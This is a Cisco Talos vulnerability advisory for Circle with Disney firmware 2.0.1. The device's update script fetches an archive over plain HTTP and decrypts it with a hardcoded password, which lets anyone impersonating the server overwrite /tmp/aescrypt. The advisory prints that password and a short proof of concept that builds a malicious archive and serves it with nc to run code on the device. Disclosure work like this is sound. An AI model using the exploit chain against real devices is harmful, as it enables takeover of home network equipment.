An exploitable vulnerability exists in the servers update functionality of Circle with Disney running firmware 2.0.1. Specially crafted network packets can cause the device to overwrite sensitive files, resulting in code execution. An attacker needs to impersonate a remote server in order to trigger this vulnerability.
Circle with Disney 2.0.1
9.0 - CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
CWE-73: External Control of File Name or Path
Circle with Disney is a network device used to monitor internet use of children on a given network.
A cronjob exists which executes the script "check_circleservers.sh" every 4 hours:
#!/bin/sh MAC=`cat /tmp/MAC`; VER=`cat /tmp/circleservers.ver` CIRCLE_ROOT=`cat /tmp/CIRCLE_ROOT` rm -f /tmp/circleservers.bin /tmp/circleserver.tgz /tmp/wget -q -t 1 -T 30 -O /tmp/circleservers.bin "http://download.meetcircle.co/dev/firmware/get_circleservers.php? DEVID=$MAC&VER=$VER" || exit if [ -s /tmp/circleservers.bin ]; then /tmp/aescrypt -d -p a801e2f7bd4104073a296dc5c63857cf -o /tmp/circleservers.tgz /tmp/circleservers.bin || exit [ -s /tmp/circleservers.tgz ] || exit cd /tmp/ tar zxf /tmp/circleservers.tgz if [ -s /tmp/circleservers ]; then $CIRCLE_ROOT/ipsetload circleservers /tmp/circleservers cp -f /tmp/circleservers $CIRCLE_ROOT/scripts/circleservers.list fi fi rm -f /tmp/circleservers.bin /tmp/circleservers.tgz
The script above downloads an encrypted tar archive using an HTTP request, which gets then decrypted and extracted in the "/tmp" directory. Since the encryption password is known and the http connection is not authenticated, an attacker able to impersonate the remote server could overwrite any file in the "/tmp" directory. Since the script itself executes "/tmp/aescrypt", one of the ways to exploit this bug is to overwrite "aescrypt" with a custom executable: this allows an attacker to execute arbitrary code on the next call of the script.
The following proof of concept shows how to execute the "power_down.sh" script on the device. An attacker needs to impersonate the server "download.meetcircle.co" in order to answer to the HTTP requests.
$ echo "/mnt/shares/usr/bin/scripts/circle/power_down.sh" > aescrypt $ chmod 777 aescrypt $ tar czf evil.tgz aescrypt $ aescrypt -e -p a801e2f7bd4104073a296dc5c63857cf -o evil.bin evil.tgz $ ( echo -en "HTTP/1.0 200 OK\nContent-Length: $(stat -c%s evil.bin)\n\n"; cat evil.bin ) | sudo nc -vv -l -p 80 $ ( echo -en "HTTP/1.0 200 OK\nContent-Length: 1\n\nX" ) | sudo nc -vv -l -p 80
2017-08-02 - Vendor Disclosure
2017-10-31 - Public Release
Discovered by Claudio Bozzato and Lilith Wyatt <(^_^)> of Cisco Talos.